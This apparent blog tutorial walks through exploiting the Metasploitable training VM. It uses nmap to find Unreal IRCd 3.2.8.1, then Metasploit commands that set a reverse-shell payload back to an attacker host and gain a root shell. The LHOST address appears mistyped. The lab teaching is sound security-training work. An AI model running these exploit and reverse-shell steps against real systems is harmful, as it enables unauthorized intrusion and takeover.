Pages - Menu

Senin, 04 Februari 2013

Exploit: Metasploitable Linux

This time we will try to exploit Metasploitable linux.
What the Metasploit Linux???

Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques.

OK, first step lets try to search Information about Metasploitable Linux using nmap.
Type a command #nmap -T4 -v -A 192.168.56.102


For each port, we see the port number, service type and even an attempt at the service software version.

From here, we can grab the software version, in this case “Unreal IRC 3.2.8.1″, and do a search for vulnerabilities for that software release. Just searching “unreal3.2.8.1 exploits” in Google should do the trick. With a little searching, you can find an Unreal exploit usable through Backtrack 5′s Metasploit program that will give you a root shell. See if you can find it and give it a shot. If you strike out, no worries, we will take a closer look at this in a later tutorial.

If nothing comes up, you may not have the exact software version. Nmap tries its best, but it is not always correct. Backtrack 5′s Metasploit console has several service scanners that we can use to get exact version levels. We will take a closer look at these in the next tutorial. Then we will dive into exploiting the open services.

Next, let's type a command #search Unreal ircd

See what's available payload #show payloads
We are using a cmd/unix/reverse payload.
Type a command #set payload cmd/unix/reverse

Then, type a command #show options to display the variables in the cmd/unix/reverse payload

Rrom the information above, we have to fill RHOST (IP victim) , LHOST (IP Attacker) and Target.

#set RHOST 192.168.56.102

#set LHOST 192.169.56.1

#set TARGET 0

Now, let's try type a command
#exploit

Successfully..
Good Luck for your Harder !!!

Tidak ada komentar:

Posting Komentar